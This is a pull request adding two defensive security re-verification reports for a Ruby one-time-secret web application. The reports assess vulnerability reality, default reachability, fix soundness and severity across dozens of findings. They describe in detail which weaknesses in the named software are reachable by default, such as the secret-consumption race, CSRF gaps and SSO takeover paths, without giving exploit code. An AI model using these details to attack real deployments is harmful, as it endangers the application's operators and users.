### PR TITLE
docs(security): 2026-06 security assessment, resolutions, and re-verification

### DIFF
--- a/Gemfile
+++ b/Gemfile
@@ -19,7 +19,7 @@ source 'https://rubygems.org/'
 # ====================================
 
 gem 'otto', '~> 2.5'
-gem 'rhales', '~> 0.6.2'
+gem 'rhales', '~> 0.7.1'
 gem 'roda', '~> 3.0'
 gem 'rodauth', '~> 2.0'
 gem 'rodauth-omniauth', '~> 0.4'

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -361,7 +361,7 @@ GEM
     reverse_markdown (3.0.2)
       nokogiri
     rexml (3.4.4)
-    rhales (0.6.2)
+    rhales (0.7.1)
       json_schemer (~> 2)
       logger
       tilt (~> 2)
@@ -630,7 +630,7 @@ DEPENDENCIES
   redis (~> 5.4.0)
   reline
   rerun (~> 0.14)
-  rhales (~> 0.6.2)
+  rhales (~> 0.7.1)
   roda (~> 3.0)
   rodauth (~> 2.0)
   rodauth-omniauth (~> 0.4)

--- a/docs/security/assessment-2026-06-22/RE-VERIFICATION-2026-06-24-independent.md
+++ b/docs/security/assessment-2026-06-22/RE-VERIFICATION-2026-06-24-independent.md
@@ -1,0 +1,350 @@
+# Independent (Blind) Re-Verification — Pass 2 — of the 2026-06-22 Security Assessment
+
+**Date:** 2026-06-24  **Reviewer:** second independent pass (blind re-derivation)
+**Relationship to `RE-VERIFICATION-2026-06-24.md`:** that first pass is the comparison baseline; this
+document does **not** replace it. Its headline is the **delta** — where this blind pass diverges from the
+first, with every countable disagreement resolved by re-running the grep/read, plus the first pass's
+flagged-open items closed.
+**Stack:** Ruby 3.4.9; familia 2.11.0, otto 2.3.1, rodauth 2.42.0, rodauth-omniauth 0.6.2, oauth2 2.0.18,
+rhales 0.7.1 (all as locked). Local Valkey.
+
+---
+
+## 1. What is different about this pass (and why it was worth running)
+
+The first re-verification (2026-06-24) admitted its own structural weakness: *"the recheck was framed to
+challenge-and-qualify, so this is corroboration, not an independent re-derivation."* This pass fixes exactly
+that:
+
+- **Stage 1 (verify) is BLIND** — each of the 39 findings was re-derived from scratch against the actual
+  source and installed gems, with **no access to any prior conclusion**. Citations, vuln reality,
+  default-reachability, fix soundness, severity — all derived cold.
+- **Stage 2 (refute) defaults to OVERTURNING** — a genuinely adversarial agent, told the finding is wrong
+  until proven right, re-opening the files itself.
+- **Stage 3 (reconcile) is divergence detection with ground truth** — only here is the prior verdict
+  introduced. Every countable disagreement (caller counts, line numbers, file existence, config defaults)
+  was re-run by command and reported as ground truth, never picked between two claims.
+
+39 findings × 3 stages. 113 agents completed on the first run; **P1** and **A5** failed on transient API
+errors (stream timeout / structured-output retry cap) and were re-run separately. The four most
+consequential corrections were then **hand-verified by me directly** (§3).
+
+**The payoff:** a blind re-derivation finds things a challenge-and-qualify pass cannot. This pass surfaced
+**seven fix problems the first pass rated "sound"** (§5), impeached a load-bearing **evidence file** (§5,
+S2), **closed all of the first pass's open items** with hand-confirmed ground truth (§4), and — importantly
+— **caught an overcorrection in its own output** (§3, A3) that hand-verification reversed. The result is more
+trustworthy than either pass alone, in both directions: it does not rubber-stamp the assessment, and it does
+not rubber-stamp itself.
+
+---
+
+## 2. Bottom line
+
+The assessment remains **substantively trustworthy**: 0 fabricated citations, every finding maps to a real
+code weakness. But this pass is materially more critical than the first on the **fix prescriptions** and
+**severity calibration**, and it corrects several reachability claims in **both** directions.
+
+- **Vuln reality:** all 39 are real. This pass re-labels ~16 as `real_but_latent` (mechanism present, no
+  reachable production sink today) rather than `confirmed` — a precision refinement, not a downgrade of the
+  underlying defect.
+- **Fix soundness is the weak spot.** Of the resolution docs, this pass rates **3 unsound** (P4, **A8**,
+  **P1**), **4 incomplete/regressing** (AZ2, AZ3, AZ7, **A5**), and ~20 `sound_with_caveats`. Only a handful
+  are clean. **A8 and A5 are the most important new results: the first pass called both fixes `sound`;
+  A8 is a no-op** on the default/primary databases and **A5's HMAC fix kills recovery codes on the primary
+  flow** (§5). Because these are the boldest divergences, **both were hand-verified against the rodauth
+  source**, not taken on agent word (§3e–§3f).
+- **Severity recalibrations proposed:** A4 High→Medium, D1 High→Medium, S1 High→Medium; AZ1/AZ3/AZ4/AZ5
+  Medium→Low; P2 and D2 effectively Low. A1 stays Critical, C1 stays High, S2 stays High.
+- **23 of the first pass's corrections were independently reproduced blind** — the strongest possible
+  confirmation that those corrections were real (P4-unsound, AZ8-regresses, AZ3-regresses, AZ2-wrong-sink,
+  D1-wrong-chain, the AZ1/AZ4/S3 default-flag errors, and more).
+
+---
+
+## 3. The six hand-verified findings (not taken on agent word)
+
+The advisor's rule — re-verify by command when this pass diverges from the prior in a severity-relevant
+direction — caught the single most important error in *this* pass's own output.
+
+### 3a. A3 — this pass's reconcile agent OVERCORRECTED; reverted to reach=FALSE (prior was right)
+
+This pass's A3 reconcile agent flipped default-reachable to **TRUE**, reasoning that `authentication.enabled`
+defaults true (`config.defaults.yaml:240`, `AUTH_ENABLED != 'false'`) and `reset_password` is enabled
+unconditionally. **Hand-verification shows that is wrong**, and it is the *same* error class the agent
+accused the prior pass of:
+
+- `authentication.mode` defaults to **`simple`** (no `mode:` key under `authentication:` in the defaults →
+  `auth_config.rb#mode` returns `'simple'`).
+- `registry.rb:158-160`: `unless Onetime.auth_config.full_enabled? { reject web/auth/ }` — the **entire
+  Rodauth auth app is not mounted in simple mode**. `full_enabled? == (mode == 'full')`.
+- Therefore the A3-cited sink (`apps/web/auth/config/email/reset_password.rb` → Rodauth `base_url` →
+  `request.host`) is **full-mode-only**, i.e. **NOT default-reachable**.
+
+**Verdict: A3 reach = FALSE** (the prior pass and the risk register were correct). A3 remains a real **High**
+weakness *when full auth is enabled*. **The default-mode reset path was also checked and is safe by
+construction** (hand-verified): in `simple` mode **Core** handles password reset (`routes.txt:32` →
+`Core::Controllers::Registration#request_password_reset_email` →
+`apps/api/account/logic/authentication/reset_password_request.rb`), which enqueues the `:password_request`
+email **without** a `baseuri` override; the mail view therefore falls back to `site_baseuri`, built from
+`conf_dig('site','host')` (canonical config), **not** `request.host` (`lib/onetime/mail/views/base.rb:401-406`).
+So the default reset link is **not** host-header poisonable. A3 is genuinely not default-reachable on either
+path — and the simple-mode path is hardened, not merely unmounted.
+
+**The discriminator (applies to every reachability call).** `web/auth` (the Rodauth account app — signup
+UI, password-reset email, MFA, SSO, lockout) is **not mounted unless `mode == 'full'`** (`registry.rb:158`),
+so A1/A2/A3/A4/A5/A6/A7/A8 are correctly **not default-reachable**. By contrast the **`/api/*` apps are
+always mounted**, and `account_creation_allowed?` (`auth_strategies.rb:49-54`) gates `sessionauth`/`basicauth`
+purely on `site.authentication.enabled == true` (mode-independent, default on) — so cookie-session and
+basic-auth API endpoints **do** exist out of the box. This is exactly why **P1's reach=partial is correct
+(hand-verified) while A3's reach=true was wrong**: same "auth on by default" premise, but P1's sink is on the
+always-mounted `/api` surface and A3's is in the full-mode-only `web/auth` app.
+
+### 3b. AZ2 — `serialize_organization` located; the first pass's open item is CLOSED
+
+The first pass could not find the stripper and relayed the claim. Hand-confirmed at
+`apps/api/organizations/logic/base.rb:61-80`:
+- `record[:id] = record[:objid]` (`:66`) — **objid still leaks** as the `id` alias.
+- `owner_extid` substituted (`:72`), then `record.delete(:owner_id)` (`:74`) — **the finding's `owner_id`
+  headline is STALE; it is already stripped.**
+- Residual member-visible leak rides `created_by`, `contact_email`, `billing_email` (none stripped) + the
+  objid alias. The fix must edit `serialize_organization`, **not** the non-existent raw-`safe_dump`
+  success_data the doc depicts; and removing `:objid` breaks the frontend zod contract + `O-Organization-ID`
+  interceptor. Verdict: **fix incomplete_regresses** (first pass: sound_with_caveats).
+
+### 3c. AZ8 — definitive caller count is 7 (first pass said 5, its sub-agent said 2)
+
+Hand-confirmed **7** `Customer.create!` callsites passing `role:`/`verified:` as literal kwargs:
+`create_customer.rb:62`, `sync_session.rb:175`, `apitoken_command.rb:168` **and `:190`**,
+`customers/create_command.rb:97` **and `:121`**, `dev_basic_auth_strategy.rb:182`. The first pass's "5"
+counted files, not callsites (missed the second `create!` in two CLI files). A name-based forbidden-raise
+breaks all 7 — so the prescribed fix is **incomplete_regresses**; the sound fix is an opt-in
+`allow_privileged:` kwarg gate (see §6).
+
+### 3d. C1 — code-only re-confirmation (PoC deliberately not re-run)
+
+Citations resolve in familia 2.11.0 (`secret_state_management.rb:60-89` in-memory guard then unconditional
+`destroy!`; `persistence.rb:558`/`database_commands.rb:252-256` no WATCH/precondition). Option A's `consume!`
+is a single-`EVAL` single-winner (the `dbclient.eval(keys:, argv:)` keyword form is real and in-app use).
+Caveat the first pass missed: Option A's "rebuild ciphertext from fields" under-specifies the encrypted-field
+**AAD context** — the correct realization decrypts the already-loaded in-memory winner, not raw `HGETALL`.
+Verdict: **sound_with_caveats**. Runtime evidence (`evidence/race_poc_*`) stands; not re-run.
+
+### 3e. A8 — "fix is a no-op" CONFIRMED against rodauth source
+
+The boldest divergence (first pass: `sound`). All three required facts verified in rodauth-2.42.0:
+`set_deadline_values?` is `db.database_type == :mysql` (`base.rb:750-752`); `set_deadline_value` writes
+`hash[column]` **only inside `if set_deadline_values?`** (`base.rb:920-926`); `account_lockouts_deadline_interval`
+is consumed at exactly one site (`lockout.rb:172`); and the non-MySQL `account_lockouts.deadline` column carries
+`default: Sequel.date_add(CURRENT_TIMESTAMP, days: 1)` (`001_initial.rb:47-53`, `deadline_opts[1]`). So on
+SQLite (default) and Postgres the deadline comes from the **DB column default** and the interval override does
+nothing. **Fix = unsound, confirmed.**
+
+### 3f. A5 — "double-HMAC kills recovery codes" CONFIRMED against gem + resolution doc
+
+The other bold divergence (first pass: `sound`). Verified: `recovery_codes` is an `auth_cached_method`
+(`recovery_codes.rb:49`) returning stored DB values; the OTS hook `mfa.rb` emits
+`json_response[:recovery_codes] = recovery_codes` on `after_otp_setup` auto-add. The resolution doc overrides
+**only** `add_recovery_code` (store HMAC) and `recovery_code_match?` (compare HMAC), and routes cleartext
+display through a stash **"for the add-recovery-codes response only"** — it never rewires the OTS
+`after_otp_setup` path, which keeps emitting the now-HMAC'd readback to the user → submitted value is HMAC'd
+again → **recovery codes dead on the primary OTS flow.** **Fix = incomplete_regresses, confirmed.**
+
+---
+
+## 4. Open items from the first pass — all CLOSED with ground truth
+
+| Open item | Closed answer (command-verified) |
+|---|---|
+| **AZ2** `serialize_organization` sink | Exists `base.rb:61-80`; strips `owner_id` (stale headline), leaks `created_by`/PII + objid-alias. §3b |
+| **AZ8** caller count | **7** callsites / 5 files (not 2, not 5). §3c |
+| **AZ1** default-flag | Register **No** correct, doc header **Yes** wrong. Prior *conclusion* right; prior *rationale* ("auth off") wrong — auth is on, the divergence is gated by **billing** off (STANDALONE_ENTITLEMENTS includes `manage_members`). |
+| **AZ4** default-flag | Register **No** correct (`config.defaults.yaml:529` orgs default off); doc header **Yes** wrong. No reachable owner-escalation path (triple-guarded at the sole caller). |
+| **S3** default-flag | Register **Yes** correct (`guest_routes.reveal` default true `:193`, CSP off `:353`); doc header **No** is misleading. Stock install IS affected. |
+| **AZ3** `planid` mispoint + `is_default` regression | `planid` declared at `with_organization_billing.rb:34`, **not** `organization.rb:87` (an init default). Splat callers passing `is_default:true`: **3 production + 6 spec** (incl. `lazy_organization_creation_spec.rb`, which no prior input named). Fix = add `is_default` to allowlist. §6 |
+| **D1** transitive chain | oauth2 pulled by `omniauth-oauth2`/`omniauth-google-oauth2` (Gemfile.lock:290/294), **not** `rack-oauth2` (a different gem). `2.0.22` is permitted by `~> 2.0` (installed 2.0.24 satisfies it). |
+| **P4** dummy/timing | `Customer.dummy` sets **no** apitoken → `apitoken?` short-circuits at `customer.rb:263` before `secure_compare`; V1 uses `Rack::Utils.secure_compare` (sub-µs), **not** BCrypt. Fix unsound; dummy must carry a real token. |
+| **A1** pure-SSO gap | `resolve_omniauth_email` does **not** exist yet (0 hits); the proposed `account_has_other_authenticators?` returns false for pure-SSO accounts → cross-provider takeover of a pure-SSO victim is **not** closed by the design as written. |
+| **P1** SameSite / env-key / blanket exemption | Session cookie default **is** `SameSite=Lax` (`boot.rb:80-85`, `config.defaults.yaml:293`); `env['otts.auth_method']` is **never populated** (0 hits, wrong layer); `/api/` exemption **is** blanket (`security.rb:142`). `sessionauth` is registered by default (mode-independent) → reach=partial. |
+
+---
+
+## 5. New problems this pass found that the first pass MISSED
+
+These are the value-add — the first pass rated each "sound" (or didn't analyze it).
+
+- **A8 — fix is UNSOUND (first pass: `sound`).** Overriding `account_lockouts_deadline_interval` is a
+  **no-op on SQLite (default) and Postgres**: the 1-day deadline comes from the **DB column default**, and
+  `set_deadline_value` writes the interval only when `set_deadline_values? == (db type == :mysql)`
+  (`base.rb:750-752, 920-926`; migration `001_initial.rb:47-53`). A complete fix must override
+  `set_deadline_values?` to true (single source of truth) or pair a column-default migration *with* the
+  interval for MySQL. The doc's exponential-backoff block is dead-on-arrival on every backend.
+- **A5 — fix is INCOMPLETE_REGRESSES (first pass: `sound`).** The HMAC fix overrides recovery-code store +
+  compare but **not** the `auth_cached_method` readback (`recovery_codes.rb:49`), so `mfa.rb:248`
+  (`after_otp_setup` auto-add) emits the **HMACs** to the user → the user submits an HMAC → it gets HMAC'd
+  again → **double-HMAC, recovery codes dead on the primary OTS flow**. The migration also rewrites `code`,
+  which is half the composite PK `[:id, :code]` (`001_initial.rb:197`) — must delete+insert per row, not
+  `UPDATE` in place. Fix: route display through a request-scoped cleartext stash; keep stored values HMAC'd.
+- **P1 — fix is UNSOUND (first pass: `sound_with_caveats`).** Three independent failures against
+  rack-protection 4.2.1: `:except_when` is **not a recognized option** (only `:allow_if`); wrong lambda
+  **arity** (the gem calls `allow_if.call(env)` single-arg, the sketch is `->(req, env)`); and
+  `env['otts.auth_method']` is **never populated** and unreadable at middleware time (the Security middleware
+  runs before post-routing auth resolves). Reach also corrected `false`→**partial** (hand-verified §3a):
+  `sessionauth` is registered by default, so cookie-auth `/api` mutation endpoints exist; SameSite=Lax blocks
+  the headline cross-site POST, leaving same-site-subdomain / legacy-browser residuals. Corrected fix:
+  discriminate inside the existing single-arg lambda — exempt only requests with no `onetime.session` cookie
+  or an explicit `Authorization` header; enforce `X-CSRF-Token` otherwise (the SPA already sends it).
+- **S2 — the "Confirmed live" evidence is methodologically INVALID.** `evidence/headers_output.md` has
+  **no valid HTML-200 capture**: the only 200 is `GET /api/v2/status` (JSON — `X-Frame-Options` never fires
+  on JSON, even after a fix), and the only HTML-path request (`GET /`) **500'd from a harness bug**
+  (`Rack::Lint`: `HTTP_USER_AGENT` nil). The S2 vuln still stands on code analysis, but the empirical proof
+  the first pass accepted does not exist. (The same file is the S1/S2 evidence cited across the docs.)
+- **S1 — fix is SCOPE-INCOMPLETE (first pass: `sound`).** Flipping `CSP_ENABLED` only makes the **API v1
+  JSON app** emit CSP (`helpers.rb:212`, the sole writer). The **secret-display HTML pages** (`/secret/*`,
+  `/` → `Core::Controllers::Page#index`) have **no CSP write path** (otto's `send_csp_headers` is never
+  called). The doc's own stated goal — protect the page that shows the secret — is not met by the flag flip.
+- **D3 — fix step 2 is NON-IMPLEMENTABLE (first pass: `sound`).** The CI host-side `*.map` delete "after
+  Sentry upload, before packaging" has no such window: the image is **built+pushed before** the Sentry step,
+  and the targeted `public/web/dist` is gitignored/absent host-side. Strip maps **inside** the Dockerfile
+  build stage instead.
+- **AZ5 — fix ships an always-on DEPLOY HAZARD (first pass: `sound`).** `EXTID_HMAC_SECRET` is never bridged
+  (`configure_familia.rb:55` bridges only the verifiable-id secret), and `Organization.create!` runs on
+  **every signup** (not orgs-gated), wrapped in a `rescue → nil` swallow. An unprovisioned deploy silently
+  breaks default-workspace creation. Add the env bridge + deploy ordering; also Customer/CustomDomain share
+  the unkeyed pattern (org-only fix is incomplete).
+- **P3 — fix UNDER-COUNTS (first pass: `sound`).** `record_secret_creation! if greenlighted` records only on
+  success, so failed/abusive creation floods burn no quota. Count at attempt time.
+- **AZ7 — escalated to INCOMPLETE_REGRESSES (first pass: `sound_with_caveats`).** Backend-only edits break
+  the frontend: `AcceptInvite.vue:134` `.parse()` requires `invited_by_email` + `account_exists` (the latter
+  also drives the signin/signup branch at `:97`). Must ship frontend changes in lockstep.
+- **A2 — fix `sound_with_caveats` + a sub-claim is FALSE.** The "SSO silently overrides
+  `mfa_policy == :required`" aggravator is **dead code** — `mfa_policy` is never populated in production
+  (`detect_mfa_requirement.rb`); the lone caller omits it. The bypass-for-enrolled-accounts is real; the
+  named `:required` override is not. The fix sketch also violates the operation's documented pure-function
+  contract.
+- **Compile-level defects in fix snippets:** **AZ9** (`client_ip`/`domain_key` used cross-method →
+  NameError), **A6** (bare `env` not in scope → NameError; `allowed_webauthn_host?` doesn't exist),
+  **S2** (HSTS flag flips emit on plain HTTP; `http_origin` flip `:deny`s legit cross-origin POSTs),
+  **C4** (`defined?(RSpec)` boot guard raises under Tryouts → breaks the whole suite).
+
+---
+
+## 6. Corrected fixes (the actionable rewrites)
+
+Full text per finding lives in the working detail; the load-bearing ones:
+
+- **AZ3 — one-line fix:** `CREATE_ALLOWED_ATTRS = %i[display_name description is_default].freeze`. `is_default`
+  is a workspace flag (delete-protection / same-customer domain-SSO), not a billing field — safe to
+  allowlist; `planid`/`complimentary`/`stripe_*` stay excluded (the real goal). Correct the doc's "owned by
+  trusted internal flows" comment.
+- **AZ8 — opt-in gate (Option B, lowest churn):** in `Customer.create!`, `kwargs.delete(:allow_privileged)`;
+  unless set, raise if any of `%i[role verified verified_by]` present. Add `allow_privileged: true` to the 7
+  legitimate callers. A future `create!(**raw_params)` carries no flag → attacker `role:'colonel'` raises.
+  (Name-based "special-case the literals" is impossible — literal and forwarded `'customer'` are identical.)
+- **AZ2 — edit `serialize_organization`:** delete `:identifier`/`:created_by` from the member baseline; keep
+  `owner_id` deletion; **defer `:objid` removal** behind a coordinated interceptor+store+contract migration
+  (it is a hard runtime dependency); nil-out (don't delete) `contact_email`/`billing_email` for non-admins
+  (contract requires the key present); author the missing `entitlement_in?` helper; gate the `members[]`
+  array (`get_organization.rb:54-60` emits `member.objid` + email).
+- **P4 — give the dummy a real token:** in `Customer.dummy`, `apitoken = SecureRandom.hex(32)` before
+  `freeze`, so a wrong guess reaches `secure_compare`. Residual: `load_by_extid_or_email` still
+  deserializes on hit vs nil on miss — optional defense-in-depth, noise-dominated.
+- **A8, S1, D3, AZ5, P3, A2, A6, AZ9, C4, S2:** see §5 — each has a concrete corrected prescription in the
+  per-finding detail.
+
+---
+
+## 7. Severity & default-reachability recalibrations
+
+| ID | This pass | Rationale (ground-truth) |
+|---|---|---|
+| A4 | High → **Medium** (standalone) | High only via the A1 takeover chain, which A1 already carries as Critical — double-count. Standalone = self-account policy bypass. |
+| D1 | High → **Medium** | Only fixed trusted endpoints (Google/GitHub/Entra) reach the oauth2 sink; the tenant-injectable OIDC issuer path uses `rack-oauth2`, not the vulnerable gem. |
+| S1 | High → **Medium** | Defense-in-depth, no demonstrated XSS sink; nonce infra wired; and the flag-flip fix doesn't even cover the secret pages. |
+| P1 | High → **Medium**; reach false → **partial** | Blanket `/api/` token-CSRF exemption over cookie-auth mutations is real (> Low), but SameSite=Lax default blocks the headline cross-site POST (< High). `sessionauth` on `/api` is default-on (§3a discriminator). |
+| P2 | Medium → **Low** (default) / Medium (domains on) | Register row "Default: Yes" overstates — needs a private/loopback/SSRF vantage AND `domains.enabled` (default off). |
+| D2 | Medium → **Low** (practical) | Native browser FormData + hardcoded field name + `node_modules` deleted at runtime. Finding-detail's **HIGH** header self-contradicts the register's Medium. |
+| AZ1/AZ3/AZ4/AZ5 | Medium → **Low** | Latent, default-off, no reachable sink; AZ1/AZ4 caller-guarded. |
+| A3 | High holds; **reach FALSE** | §3a — cited sink is full-mode-only. |
+| A1 / C1 / S2 | unchanged (Critical / High / High) | Confirmed. |
+
+---
+
+## 8. Meta-findings (reaffirmed from the first pass)
+
+1. **"Fork" mislabel is cosmetic.** `rodauth` (2.42.0) and `rodauth-omniauth` (0.6.2) resolve to upstream
+   rubygems with no `path:`/`git:` override; ~20 findings cite "fork" files that are stock gems. No finding
+   is undermined — every auth/SSO vuln is correctly attributed to OTS config. Correct the header wording.
+2. **Citation drift is minor and never fabricated** — abbreviated gem paths, ±a few lines, the odd mispoint
+   (`planid`, A8 `before_login_attempt` ~9 lines). Every load-bearing construct resolves.
+3. **Systemic clarification — there are TWO auth surfaces, gated differently.** `authentication.enabled`
+   defaults **true**, but `authentication.mode` defaults **`simple`**. The two surfaces:
+   - **`web/auth` (Rodauth full account system: signup UI, password-reset email, MFA, SSO, lockout)** —
+     mounted **only in `full` mode** (`registry.rb:158`). Off by default. This is why A1/A2/A3/A4/A5/A6/A7/A8
+     are correctly *not* default-reachable, and why this pass's A3 agent erred by reading only `enabled`
+     (§3a). In `simple` mode, **Core** provides a lighter `/auth/*` implementation.
+   - **`/api/*` apps (sessionauth + basicauth)** — always mounted; `account_creation_allowed?`
+     (`auth_strategies.rb:49-54`) gates the session/basic strategies on `authentication.enabled` alone
+     (**mode-independent**). So cookie-session and API-key auth on `/api` **are** on by default.
+   This split is the correct way to read every reachability call: it is why **P1 = partial** (its sink is on
+   the always-mounted `/api` surface) while **A3 = false** (its sink is full-mode-only `web/auth`). The
+   first pass's blanket "auth off by default" was directionally right for the account system but wrong for
+   the API surface; the precise statement is the two-surface split above.
+   - *Consistency note:* **P4** (V1 basic-auth timing) is on the same always-mounted API surface, so its
+     `reach=false` is conservative — the basic-auth path is registered by default just like `sessionauth`.
+     The verdict is unaffected (Low, timing-only, fix unsound), but for method-consistency P4's
+     reachability is better read as the same default-on/partial as P1.
+
+---
+
+## 9. Per-finding verdict matrix (this pass)
+
+`vuln / default-reachable / fix / severity`. `Div` = count of divergences from the first pass. `Repro` =
+this blind pass independently reproduced a first-pass correction.
+
+| ID | vuln / reach / fix / severity | Div | Repro | Conf |
+|---|---|---|---|---|
+| A1 | real_but_latent / false / sound_with_caveats / Critical | 2 | . | high |
+| C1 | confirmed / true / sound_with_caveats / High | 2 | . | high |
+| A2 | confirmed / false / sound_with_caveats / Low-Medium | 3 | . | high |
+| A3 | confirmed / **false** (corrected §3a) / sound_with_caveats / High | 1 | Y | high |
+| A4 | confirmed / false / sound_with_caveats / **Medium** (standalone) | 2 | Y | high |
+| P1 | real_but_latent / **partial** / **unsound** / **Medium** | 5 | Y | high |
+| S1 | confirmed / true / **sound_with_caveats** / **Medium** | 3 | . | high |
+| S2 | confirmed / true / sound_with_caveats / High | 3 | Y | high |
+| D1 | confirmed / false / sound / **Medium** | 2 | Y | high |
+| C2 | confirmed / true / sound / Medium | 2 | Y | high |
+| C3 | confirmed / true / sound_with_caveats / Medium | 0 | Y | high |
+| P2 | confirmed / false / sound_with_caveats / **Low** (default) | 5 | Y | high |
+| P3 | confirmed / true / **sound_with_caveats** / Medium | 1 | . | high |
+| AZ1 | real_but_latent / false / sound / **Low** | 6 | Y | high |
+| AZ2 | confirmed / partial / **incomplete_regresses** / Medium | 4 | Y | high |
+| AZ3 | real_but_latent / false / **incomplete_regresses** / **Low** | 4 | Y | high |
+| AZ4 | real_but_latent / false / sound_with_caveats / **Low** | 3 | Y | high |
+| AZ5 | real_but_latent / false / **sound_with_caveats** / **Low** | 4 | . | high |
+| A5 | confirmed / false / **incomplete_regresses** / Medium | 5 | . | high |
+| A6 | real_but_latent / false / sound_with_caveats / Medium | 0 | Y | high |
+| A7 | confirmed / false / sound_with_caveats / Medium | 1 | Y | high |
+| A8 | confirmed / false / **unsound** / Medium | 5 | . | high |
+| D2 | real_but_latent / false / sound / **Low** (practical) | 3 | . | high |
+| D3 | confirmed / true / **sound_with_caveats** / Medium | 3 | Y | high |
+| D4 | real_but_latent / partial / sound_with_caveats / Medium | 4 | . | high |
+| D5 | confirmed / true / sound_with_caveats / Medium | 2 | Y | high |
+| S3 | confirmed / true / sound_with_caveats / Medium | 1 | . | high |
+| C4 | confirmed / partial / sound_with_caveats / Low–Medium | 2 | Y | high |
+| C5 | confirmed / true / sound_with_caveats / Low | 0 | Y | high |
+| C6 | real_but_latent / partial / sound_with_caveats / Low (info) | 4 | . | high |
+| AZ6 | confirmed / true / sound_with_caveats / Low | 3 | . | high |
+| AZ7 | confirmed / partial / **incomplete_regresses** / Low | 4 | Y | high |
+| AZ8 | real_but_latent / false / **incomplete_regresses** / Low | 2 | Y | high |
+| AZ9 | real_but_latent / false / sound_with_caveats / Low | 2 | Y | high |
+| P4 | real_but_latent / false / **unsound** / Low | 5 | Y | high |
+| P5 | real_but_latent / false / sound_with_caveats / Low | 3 | Y | high |
+| S4 | real_but_latent / false / sound_with_caveats / Low | 3 | Y | high |
+| S5 | real_but_latent / false / sound_with_caveats / Low | 2 | . | high |
+| OBS1 | real_but_latent / false / sound / Info | 0 | . | high |
+
+_39 findings; blind verify → adversarial refute → ground-truth reconcile. 119 agents (113 + 6 P1/A5 re-run).
+Eight load-bearing facts hand-verified directly against source: A3 reach (both paths), AZ2
+`serialize_organization` sink, AZ8 caller count, P1 `sessionauth` reach, C1 atomicity, **A8 no-op**,
+**A5 double-HMAC**, and the simple/full auth-mount split — including one reversal of this pass's own A3 output.
+The two boldest new divergences (A8, A5) were deliberately the most verified, not the least._

--- a/docs/security/assessment-2026-06-22/RE-VERIFICATION-2026-06-24.md
+++ b/docs/security/assessment-2026-06-22/RE-VERIFICATION-2026-06-24.md
@@ -1,0 +1,488 @@
+# Independent Re-Verification of the 2026-06-22 Security Assessment
+
+**Date:** 2026-06-24 **Reviewer:** independent re-verification pass (audit-grade)
+**Scope:** all 38 findings of `docs/security/assessment-2026-06-22/` — citation accuracy, vulnerability
+reality, fix soundness, and severity calibration.
+**Stack under verification:** Ruby 3.4.9; **familia 2.11.0, otto 2.3.1, rhales 0.7.1** (bumped from
+2.10.1 / 2.3.1 / 0.6.2 at the maintainer's request); rodauth 2.42.0, rodauth-omniauth 0.6.2, oauth2 2.0.18
+(all as locked). Local Valkey.
+
+> **Method.** Each finding was re-checked by an independent agent (resolve every `file:line` citation
+> against the actual source — app code, and library code in the *installed gems*; confirm the weakness is
+> real and reachable; judge the prescribed fix; calibrate severity), then a second adversarial agent tried
+> to **overturn** that verdict with code evidence. 76 agents total. The headline finding (**C1**) was
+> additionally re-verified at runtime by booting the real application stack and reproducing the race.
+
+---
+
+## 1. Bottom line
+
+**The assessment is substantively trustworthy.** It is not AI confabulation: across 38 findings,
+
+- **0 fabricated or badly-mispointed citations.** Every cited construct resolves in the actual source
+  (app or installed gem). Drift is limited to ±a few lines and abbreviated paths; the single genuine
+  mispoint is minor (AZ3's `organization.rb:87`, an init default rather than the field declaration).
+- **38/38 weaknesses are real.** 30 confirmed outright; 8 are *real-but-latent* (mechanism present, but
+  no reachable production sink today, or a precondition must hold) — none is a false positive.
+- **No verify verdict was overturned** by the adversarial recheck — but the recheck was framed to
+  challenge-and-*qualify*, so this is corroboration, not an independent re-derivation of every verdict;
+  in a few cases (AZ8, A1) it *strengthened* the criticism. **The four most consequential §4 corrections
+  (P1, P4, AZ8, AZ3) were additionally re-checked by hand** (direct file reads), not taken on sub-agent word.
+- **C1 — the headline — independently reproduced at runtime on familia 2.11.0:** 10/10 (model barrier)
+  and **12/12 independent OS processes obtained the same one-time secret's plaintext**; the key was then
+  consumed. The prescribed fix (Option A) is genuinely atomic.
+
+The re-verification's contribution is therefore **refinement, not refutation**: two severity downgrades,
+nine default-config-flag corrections, and five resolution-docs whose *prescribed fix* would misfire if
+implemented verbatim. These are listed in §3–§4.
+
+### Severity tally (re-verified)
+1 Critical (A1), 8 High (one — P1 — recommended down to Medium; one — P2 — keeps severity but loses its
+default-config claim), ~16 Medium, ~12 Low/Info. The assessment's own tally holds.
+
+---
+
+## 2. Per-finding verdict matrix
+
+`Severity check`: upheld / overstated(→proposed). `Default flag`: does the doc's "affects default config?"
+match reality. `Vuln`: confirmed / partial(real-but-latent). `Dflt-reachable`: exploitable in the
+out-of-the-box config (auth + SSO + diagnostics OFF). `Fix`: soundness of the *prescribed* resolution.
+`Recheck`: adversarial outcome (`none` = verify verdict survived).
+
+| ID | Claimed | Severity check | Default flag | Citations | Vuln | Dflt-reachable | Fix | Recheck |
+|---|---|---|---|---|---|---|---|---|
+| A1 | Critical | upheld | correct | minor_drift | confirmed | False | sound_with_caveats | none |
+| C1 | High | upheld | correct | all_accurate | confirmed | **True** | sound | none |
+| A2 | Low-Med | upheld | correct | all_accurate | confirmed | False | sound | none |
+| A3/P2 | High | **A3 holds; P2 default overstated** | partial | all_accurate | confirmed | False | sound_with_caveats | none |
+| A4 | High | upheld | correct | all_accurate | confirmed | False | sound_with_caveats | none |
+| P1 | High | **overstated → Medium** | correct | all_accurate | partial | False | sound_with_caveats | none |
+| S1 | High | upheld | correct | minor_drift | confirmed | **True** | sound | none |
+| S2 | High | upheld | correct | minor_drift | confirmed | **True** | sound_with_caveats | none |
+| D1 | High | upheld | correct | all_accurate | confirmed | False | sound | none |
+| C2 | Medium | upheld | correct | all_accurate | confirmed | True | sound | none |
+| C3 | Medium | upheld | correct | minor_drift | confirmed | True | sound_with_caveats | none |
+| P3 | Medium | upheld | correct | all_accurate | confirmed | True | sound | none |
+| AZ1 | Medium | upheld | **incorrect (doc says Yes; No)** | all_accurate | confirmed | False | sound | none |
+| AZ2 | Medium | upheld | correct | all_accurate | confirmed | False | **sound_with_caveats (wrong sink)** | none |
+| AZ3 | Medium | upheld | correct | minor_drift | partial | False | **sound_with_caveats (regresses callers)** | none |
+| AZ4 | Medium | upheld | **incorrect (doc says Yes; No)** | all_accurate | partial | False | sound_with_caveats | none |
+| AZ5 | Medium | upheld | correct | all_accurate | confirmed | False | sound | none |
+| A5 | Medium | upheld | correct | minor_drift | confirmed | False | sound | none |
